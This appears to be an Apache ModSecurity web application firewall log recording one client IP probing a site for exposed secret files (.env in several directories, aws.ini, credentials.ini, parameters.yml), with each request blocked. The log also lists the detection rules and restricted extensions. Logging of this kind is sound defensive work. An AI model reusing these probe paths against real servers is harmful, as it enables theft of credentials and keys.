[Mon May 11 20:56:01.486920 2026] [security2:error] [pid 1501883:tid 1501909] [client 195.178.110.199:36142] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/config/.env"] [unique_id "agImQTP5Q_-MBliRCAxnqwAAABg"]
[Mon May 11 20:56:01.501805 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cms/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cms/.env"] [unique_id "agImQfjVc-A-CSptvm1xrQAAAFU"]
[Mon May 11 20:56:01.501954 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cms/.env"] [unique_id "agImQfjVc-A-CSptvm1xrQAAAFU"]
[Mon May 11 20:56:01.502120 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cms/.env"] [unique_id "agImQfjVc-A-CSptvm1xrQAAAFU"]
[Mon May 11 20:56:01.505738 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/config/aws.ini"] [unique_id "agImQTP5Q_-MBliRCAxnrQAAABY"]
[Mon May 11 20:56:01.505970 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/config/aws.ini"] [unique_id "agImQTP5Q_-MBliRCAxnrQAAABY"]
[Mon May 11 20:56:01.506132 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/config/aws.ini"] [unique_id "agImQTP5Q_-MBliRCAxnrQAAABY"]
[Mon May 11 20:56:01.725962 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Matched phrase "/config/parameters.yml" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /config/parameters.yml found within REQUEST_FILENAME: /config/parameters.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/config/parameters.yml"] [unique_id "agImQSMeXtzav-mi9SyxzQAAAMo"]
[Mon May 11 20:56:01.726112 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/config/parameters.yml"] [unique_id "agImQSMeXtzav-mi9SyxzQAAAMo"]
[Mon May 11 20:56:01.726526 2026] [security2:error] [pid 1516058:tid 1516100] [client 195.178.110.199:36156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/config/parameters.yml"] [unique_id "agImQSMeXtzav-mi9SyxzQAAAMo"]
[Mon May 11 20:56:01.765102 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/configs/application.ini"] [unique_id "agImQSMeXtzav-mi9SyxzgAAANg"]
[Mon May 11 20:56:01.765363 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/configs/application.ini"] [unique_id "agImQSMeXtzav-mi9SyxzgAAANg"]
[Mon May 11 20:56:01.765545 2026] [security2:error] [pid 1516058:tid 1516114] [client 195.178.110.199:36174] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/configs/application.ini"] [unique_id "agImQSMeXtzav-mi9SyxzgAAANg"]
[Mon May 11 20:56:01.801046 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/constants.ini"] [unique_id "agImQVNddpkriGUb6ZV27AAAARg"]
[Mon May 11 20:56:01.801322 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/constants.ini"] [unique_id "agImQVNddpkriGUb6ZV27AAAARg"]
[Mon May 11 20:56:01.801583 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/constants.ini"] [unique_id "agImQVNddpkriGUb6ZV27AAAARg"]
[Mon May 11 20:56:01.913441 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".ini"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "conge.tct-telecom.fr"] [uri "/credentials.ini"] [unique_id "agImQfjVc-A-CSptvm1xtAAAAFE"]
[Mon May 11 20:56:01.913698 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/credentials.ini"] [unique_id "agImQfjVc-A-CSptvm1xtAAAAFE"]
[Mon May 11 20:56:01.913874 2026] [security2:error] [pid 1511173:tid 1511193] [client 195.178.110.199:36082] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/credentials.ini"] [unique_id "agImQfjVc-A-CSptvm1xtAAAAFE"]
[Mon May 11 20:56:01.943189 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/crm/.env"] [unique_id "agImQTP5Q_-MBliRCAxnuQAAAAI"]
[Mon May 11 20:56:01.943374 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/crm/.env"] [unique_id "agImQTP5Q_-MBliRCAxnuQAAAAI"]
[Mon May 11 20:56:01.943560 2026] [security2:error] [pid 1501883:tid 1501887] [client 195.178.110.199:36178] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/crm/.env"] [unique_id "agImQTP5Q_-MBliRCAxnuQAAAAI"]
[Mon May 11 20:56:01.954190 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cron/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/cron/.env"] [unique_id "agImQVNddpkriGUb6ZV27QAAARg"]
[Mon May 11 20:56:01.954351 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/cron/.env"] [unique_id "agImQVNddpkriGUb6ZV27QAAARg"]
[Mon May 11 20:56:01.954538 2026] [security2:error] [pid 1501831:tid 1501857] [client 195.178.110.199:36172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/cron/.env"] [unique_id "agImQVNddpkriGUb6ZV27QAAARg"]
[Mon May 11 20:56:01.971747 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/demo/.env"] [unique_id "agImQfjVc-A-CSptvm1xtgAAAFU"]
[Mon May 11 20:56:01.971930 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/demo/.env"] [unique_id "agImQfjVc-A-CSptvm1xtgAAAFU"]
[Mon May 11 20:56:01.972106 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/demo/.env"] [unique_id "agImQfjVc-A-CSptvm1xtgAAAFU"]
[Mon May 11 20:56:01.991280 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/dev/.env"] [unique_id "agImQfjVc-A-CSptvm1xtwAAAFU"]
[Mon May 11 20:56:01.991449 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/dev/.env"] [unique_id "agImQfjVc-A-CSptvm1xtwAAAFU"]
[Mon May 11 20:56:01.991640 2026] [security2:error] [pid 1511173:tid 1511197] [client 195.178.110.199:36036] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/dev/.env"] [unique_id "agImQfjVc-A-CSptvm1xtwAAAFU"]
[Mon May 11 20:56:02.035024 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /develop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/develop/.env"] [unique_id "agImQteaRXe5lR8y0ZOTHQAAAUY"]
[Mon May 11 20:56:02.035275 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/develop/.env"] [unique_id "agImQteaRXe5lR8y0ZOTHQAAAUY"]
[Mon May 11 20:56:02.035515 2026] [security2:error] [pid 1534836:tid 1534877] [client 195.178.110.199:36110] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/develop/.env"] [unique_id "agImQteaRXe5lR8y0ZOTHQAAAUY"]
[Mon May 11 20:56:02.037166 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /developer/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "conge.tct-telecom.fr"] [uri "/developer/.env"] [unique_id "agImQjP5Q_-MBliRCAxnugAAABY"]
[Mon May 11 20:56:02.037338 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "conge.tct-telecom.fr"] [uri "/developer/.env"] [unique_id "agImQjP5Q_-MBliRCAxnugAAABY"]
[Mon May 11 20:56:02.037516 2026] [security2:error] [pid 1501883:tid 1501907] [client 195.178.110.199:36098] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "conge.tct-telecom.fr"] [uri "/developer/.env"] [unique_id "agImQjP5Q_-MBliRCAxnugAAABY"]
